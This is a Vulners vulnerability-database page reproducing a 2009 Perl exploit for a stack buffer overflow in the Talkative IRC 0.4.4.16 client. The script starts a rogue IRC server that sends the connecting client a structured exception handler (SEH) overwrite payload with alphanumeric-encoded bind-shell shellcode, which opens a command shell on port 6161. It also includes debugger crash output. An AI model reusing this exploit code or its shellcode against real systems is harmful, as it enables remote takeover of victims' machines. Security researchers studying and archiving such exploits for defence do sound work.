Vulners
Lucene search
Talkative IRC 0.4.4.16 Stack Overflow
`#!/usr/bin/perl
#
# Title: Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)
#
# Summary: The easiest and fastest way to meet people online. With Talkative IRC you can
# chat with thousands of people at the same time. Find people with the same interests as you.
# Join channels where you can meet people speaking your language, or start your own. No
# monthly fees or other hassle, just a download and a click. Version 0.4.4.16 makes nick list
# font customizable. Why Talkative? Mainly because it's secure, stable and easy to use.
#
# Product web page: http://www.talkative-irc.com/
#
# Desc: Talkative IRC 0.4.4.16 suffers from a stack based buffer overflow vulnerability that enables us
# to gain full control over the application and execute arbitrary commands. ECX and EIP registers gets
# overwriten, so does the SEH.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Ref: http://www.milw0rm.com/exploits/6654
#
#
#---------------------------------------------windbg output--------------------------------------------------
#
# (398.ca4): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0013f0d0 edx=00000008 esi=00000000 edi=00421c40
# eip=004d8260 esp=0013f08c ebp=0013f1c4 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0xd8260:
# 004d8260 8b40f0 mov eax,dword ptr [eax-10h] ds:0023:41414131=????????
# 0:000> g
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=42424242 edx=7c9037d8 esi=00000000 edi=00000000
# eip=42424242 esp=0013ecbc ebp=0013ecdc iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 42424242 ?? ???
#
#---------------------------------------------windbg output--------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# http://www.zeroscience.org/
#
# liquidworm {z} gmail {z} com
#
# 17.03.2009
#
use IO::Socket;
sub start_zerver()
{
my $sock = new IO::Socket::INET(
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 6667,
Proto => 'tcp'
);
die unless $sock;
header();
print "\n [*] Evil IRC Server started on port 6667\n";
my $wire = $sock -> accept();
my $junky = "A" x 272;
my $next_seh = "\xeb\x06\x90\x90";
my $seh = "\x9a\x72\x85\x7c"; #0x7C85729A pop pop ret kernel32.dll
my $nop_start = "\x90" x 25;
my $nop_end = "\x90" x 10;
# win32_bind - EXITFUNC=seh LPORT=6161 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58".
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x33\x4b\x58\x4e\x37".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x42\x45\x37\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48".
"\x49\x58\x4e\x36\x46\x32\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d".
"\x46\x36\x4b\x38\x43\x54\x42\x43\x4b\x38\x42\x54\x4e\x30\x4b\x58".
"\x42\x57\x4e\x41\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x35\x4a\x56".
"\x50\x48\x50\x54\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56".
"\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x47".
"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x56\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x45\x43\x45\x43\x34".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x4a\x51".
"\x41\x51\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x35\x4f\x4f\x48\x4d".
"\x42\x55\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x35".
"\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x56\x48\x46\x4a\x36\x43\x36".
"\x4d\x56\x49\x48\x45\x4e\x4c\x56\x42\x35\x49\x45\x49\x42\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x52".
"\x43\x59\x4d\x48\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x34\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x46".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".
"\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
print " [*] Throwing payload...\r\n";
print $wire ":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\r\n";
sleep(1);
print $wire ":" . "$junky" . "$next_seh" . "$seh" . "$nop_start" . "$shellcode" . "$nop_end" . " PRIVMSG t00t : /FINGER w00t.\r\n";
}
while (1)
{
start_zerver();
print " [*] Talkative IRC client successfully exploited!\r\n\n";
print " [**] Check shell on port 6161! [**]\r\n";
next;
}
sub header()
{
print "\n";
print "~" x 80;
print "\n";
print " Talkative IRC v0.4.4.16 Remote Stack Overflow Exploit (SEH)\n";
print " by LiquidWorm (c) 2009\n\n";
print "~" x 80;
print "\n\n";
}`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Mar 2009 00:00Current
0.1Low risk
Vulners AI Score0.1